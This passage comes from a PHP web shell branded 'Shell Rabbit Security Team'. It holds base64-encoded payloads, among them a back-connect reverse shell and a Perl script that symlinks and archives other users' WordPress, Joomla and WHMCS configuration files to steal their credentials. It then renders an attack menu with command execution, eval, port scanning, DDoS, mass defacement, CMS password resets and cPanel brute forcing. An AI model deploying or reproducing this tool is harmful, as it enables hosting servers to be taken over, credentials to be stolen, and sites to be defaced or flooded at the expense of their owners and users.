  524. ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw
  525. Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
  526. $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
  527. BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95
  528. zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75
  529. i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A
  530. RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
  531. jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F
  532. 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  533. //confshell
  534. $configshell = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPlByaXY4IFNDUjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IHRhaG9tYSwgdmVyZGFuYSwgQXJpYWw7DQogZm9udC1zaXplOiBtZWRpdW07DQogY29sb3I6ICNGRkZGRkY7DQogYmFja2dyb3VuZC1jb2xvcjogIzY2NjY2NjsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQogICAgKCR1c2VyKSA9IEBfOw0KJG1zciA9IHF4e3B3ZH07DQoka29sYT0kbXNyLiIvIi4kdXNlcjsNCiRrb2xhPX5zL1xuLy9nOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYSAtIGhvbWUudHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcy50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd29yZHByZXNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dlYi93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcyAtIHdlYi50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TU0kucGhwJywka29sYS4nLSBDIE0gRiAudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vU1NJLnBocCcsJGtvbGEuJy0gQyBNIEYgLSBmb3J1bS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJy0gTXlCQi50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nLSBNeUJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLSBPdGhlci50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2xpYi9jb25maWcucGhwJywka29sYS4nLSBCYWxpdGJhbmcudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudHMudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmdzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jcyAtIHdobWNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gd2htIC0gd2htLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLSBWQnVsbGV0aW4gLSBmb3J1bS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vY29uZmlnLnBocCcsJGtvbGEuJwktIFBocEJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jIC0gd2htYy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJwktIHdobWNzMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1tYW5nZXdobWNzLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1teXNob3AudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnQudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnRzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd3AudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd3dvcmRwcmVzcyAtIHdwIC0gYmV0YS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBiZXRhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtcHJlc3MudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLXdvcmRwcmVzcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd29yZHByZXNzLWJldGEudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC1uZXdzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbmV3LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBibG9ncy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBob21lLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gcHJvdGFsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictIHdvcmRwcmVzcyAtIHNpdGUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSB0ZXN0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhIC0gam9vbWxhIC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBwcm90YWwudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvby9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gam9vLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGNtcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gc2l0ZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbmV3cy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBuZXcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGhvbWUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHZiLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy0gdmIzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1wYW5lbC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLSB6ZW5jYXJ0IC0gc2hvcC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYgLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictIHNtZiAtIGZvcnVtLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy0gc21mIC0gZm9ydW1zLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHVwbG9hZCAudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2wvY29uZmlnLnBocCcsJGtvbGEuJy0gbWFsYXkudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy9rb25la3NpLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9zeXN0ZW0vc2lzdGVtLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOyANCiB9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPiZuYnNwOzwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5bGU9IndpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MDBweCI+PC90ZXh0YXJlYT4NCjxiciAvPjxiciAvPg0KPGlucHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9IndpZHRoOiAyMTJweCIgLz48YnIgLz48YnIgLz4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJIYWphciAuLiEiIHN0eWxlPSJ3aWR0aDogOTlweCIgLz4NCjxiciAvPg0KPC9mb3JtPic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPkRvbmUgISE8L3A+DQo8cD4mbmJzcDs8L3A+JzsNCmlmKCRGT1JNe3Rhcn0gbmUgIiIpew0Kb3BlbihJTkZPLCAidGFyLnRtcCIpOw0KQGxpbmVzID08SU5GTz4gOw0KY2xvc2UoSU5GTyk7DQpzeXN0ZW0oQGxpbmVzKTsNCnByaW50JzxwPjxhIGhyZWY9IicuJEZPUk17dGFyfS4nLnRhciI+IGRvd25sb2FkICBmaWxlPC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7';
  535. ?>
  536. <html><head><link rel="SHORTCUT ICON" href="http://i.imgur.com/1lJrMZK.png"><title>Shell Rabbit Security Team</title>
  537. <script type="text/javascript">
  538. function tukar(lama,baru){
  539. document.getElementById(lama).style.display = 'none';
  540. document.getElementById(baru).style.display = 'block';
  541. }
  542. </script>
  543. <style type="text/css">
  544. AKUSTYLE { display:none; }
  545. body { background:#111111; }
  546. a { text-decoration:none; }
  547. a:hover { border-bottom:1px solid #CC1717; }
  548. * { font-size:11px; font-family:comic sans ms; color:#FFFFFF; }
  549. #menu {
  550. background:#111111;
  551. margin:0px 0px 0px 0px;
  552. font-size:;
  553. width:100%;
  554. }
  555. #menu a {
  556. padding:14px 20px;
  557. margin:0;
  558. background:#222222;
  559. text-decoration:none;
  560. letter-spacing:2px;
  561. padding: 4px 18px;
  562. margin: 0;
  563. background: #222222;
  564. text-decoration: none;
  565. letter-spacing: 2px;
  566. border-radius: 4px;
  567. border-bottom: 2px solid #B5AFAF;
  568. border-top: 2px solid #B5AFAF;
  569. border-right: 2px solid red;
  570. border-left: 2px solid red;
  571. }
  572. #menu a:hover {
  573. background:#180000;
  574. border-bottom:0px solid #333333;
  575. border-top:0px solid #333333;
  576. }
  577. .tabnet { margin:15px auto 0 auto;border: 1px solid red; }
  578.  
  579. }
  580. .main {
  581. width:100%;
  582. }
  583. .gaya {
  584. color: #FFFFFF;
  585. }
  586. .inputz{
  587. background:#111111;
  588. border:1;
  589. padding:2px;
  590.  
  591. }
  592. .inputzbut{
  593. background:#111111;
  594. color:#FFFFFF;
  595. margin:0 4px;
  596. border:1px solid #444444;
  597.  
  598. }
  599. .inputz:hover, .inputzbut:hover{
  600. border-bottom:1px solid #FFFFFF;
  601. border-top:1px solid #FFFFFF;
  602. }
  603. .output {
  604. margin:auto;
  605. border:1px solid #FFFFFF;
  606. width:100%;
  607. height:400px;
  608. background:#000000;
  609. padding:0 2px;
  610. }
  611. .cmdbox{
  612. width:100%;
  613. }
  614. .head_info{
  615. padding: 0 4px;
  616. }
  617. .jaya{ font-family: ;}
  618.  
  619. .b374k{
  620. font-size:30px;
  621. padding:0;
  622. color:#444444;
  623. }
  624. .b374k_tbl{
  625. text-align:center;
  626. margin:0 4px 0 0;
  627. padding:0 4px 0 0;
  628. border-right:1px solid #333333;
  629. }
  630. .phpinfo table{
  631. width:100%;
  632. padding:0 0 0 0;
  633. }
  634. .phpinfo td{
  635. background:#111111;
  636. color:#cccccc;
  637. padding:6px 8px;;
  638. }
  639. .phpinfo th, th{
  640. background:#191919;
  641. border-bottom:1px solid #333333;
  642. font-weight:normal;
  643. }
  644. .phpinfo h2, .phpinfo h2 a{
  645. text-align:center;
  646. font-size:16px;
  647. padding:0;
  648. margin:30px 0 0 0;
  649. background:#222222;
  650. padding:4px 0;
  651. }
  652. .explore{
  653. width:100%;
  654. }
  655. .explore a {
  656. text-decoration:none;
  657. }
  658. .explore td{
  659. border-bottom:1px solid #333333;
  660. padding:0 8px;
  661. line-height:24px;
  662. }
  663. .explore th{
  664. padding:3px 8px;
  665. font-weight:normal;
  666. }
  667. .explore th:hover , .phpinfo th:hover{
  668. border-bottom:1px solid #FFFFFF;
  669. }
  670. .explore tr:hover{
  671. background:#111111;
  672. }
  673. .viewfile{
  674. background:#EDECEB;
  675. color:#000000;
  676. margin:4px 2px;
  677. padding:8px;
  678. }
  679. .sembunyi{
  680. display:none;
  681. padding:0;margin:0;
  682. }
  683.  
  684. </style></head>
  685. <script language='javascript'>
  686. if (document.all||document.getElementById){
  687. var thetitle=document.title
  688. document.title=''
  689. }
  690. var data="Us3 Y0ur br41n biTch ! ! !";
  691. var done=1;
  692. function statusIn(text){
  693. decrypt(text,22,22);
  694. }
  695. function statusOut(){
  696. self.status='';
  697. done=1;
  698. }
  699. function decrypt(text, max, delay){
  700. if (done){
  701. done = 0;
  702. rantit(text, max, delay, 0, max);
  703. }
  704. }
  705. function rantit(text, runs_left, delay, charvar, max){
  706. if (!done){
  707. runs_left = runs_left - 1;
  708. var status = text.substring(0,charvar);
  709. for(var current_char = charvar; current_char < text.length; current_char++){
  710. status += data.charAt(Math.round(Math.random()*data.length));
  711. }
  712. document.title = status;
  713. var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
  714. var new_char = charvar + 1;
  715. var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
  716. if(runs_left > 0){
  717. setTimeout(rerun, delay);
  718. }
  719. else{
  720. if (charvar < text.length){
  721. setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
  722. }
  723. else
  724. {
  725. done = 1;
  726. }
  727. }
  728. }
  729. }
  730. if (document.all||document.getElementById)
  731. statusIn(thetitle)
  732. </script>
  733.  
  734. <body onLoad="document.getElementById('cmd').focus();">
  735. <div class="main">
  736. <!-- head info start here -->
  737. <div class="head_info">
  738. <table ><tr>
  739. <td><table class="b374k_tbl"><tr><td><a href="?"><span class="b374k"><img src="http://i.imgur.com/PYZzmJF.png" width='320' height='130'/></span></a></td></tr><tr><td><b></b></td></tr></table></td>
  740. <td><?php echo $buff; ?></td>
  741. </tr></table>
  742. </div>
  743. <!-- head info end here -->
  744. <!-- menu start -->
  745. <center><div id="menu">
  746. <br>
  747. <a href="?<?php echo "y=".$pwd; ?>">Home</a>
  748. <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">Shell</a>
  749. <a href="?<?php echo "y=".$pwd; ?>&amp;x=php">Eval</a>
  750. <a href="?<?php echo "y=".$pwd; ?>&amp;x=sql">Mysql</a>
  751. <a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">Php Info</a>
  752. <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">Connect</a>
  753. <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">Upload</a>
  754. <a href="?<?php echo "y=".$pwd; ?>&amp;x=port-sc">Port Scan</a>
  755. <a href="?<?php echo "y=".$pwd; ?>&amp;x=dos">Ddos</a>
  756. <a href="?<?php echo "y=".$pwd; ?>&amp;x=symlink">Symlink</a><br><br>
  757. <a href="?<?php echo "y=".$pwd; ?>&amp;x=mass">Mass Deface</a>
  758. <a href="?<?php echo "y=".$pwd; ?>&amp;x=config">Config</a>
  759. <a href="?<?php echo "y=".$pwd; ?>&amp;x=jodexer">Joomla IndChange</a>
  760. <a href="?<?php echo "y=".$pwd; ?>&amp;x=wp-reset">Wordpress ResPass</a>
  761. <a href="?<?php echo "y=".$pwd; ?>&amp;x=jm-reset">Joomla ResPass</a>
  762. <a href="?<?php echo "y=".$pwd; ?>&amp;x=balit">Balitbang ResPass</a><br><br>
  763. <a href="?<?php echo "y=".$pwd; ?>&amp;x=whmcs">WHMCS Decoder</a>
  764. <a href="?<?php echo "y=".$pwd; ?>&amp;x=zone">Zone-H</a>
  765. <a href="?<?php echo "y=".$pwd; ?>&amp;x=brute">Cpanel BruteForce</a>
  766. <a href="?<?php echo "y=".$pwd; ?>&amp;x=Autocp">Auto Cpanel Cracker</a>
  767. <a href="?<?php echo "y=".$pwd; ?>&amp;x=adfin">Admin Finder</a>
  768. <a href="?<?php echo "y=".$pwd; ?>&amp;x=hash">Password Hash</a><br><br>
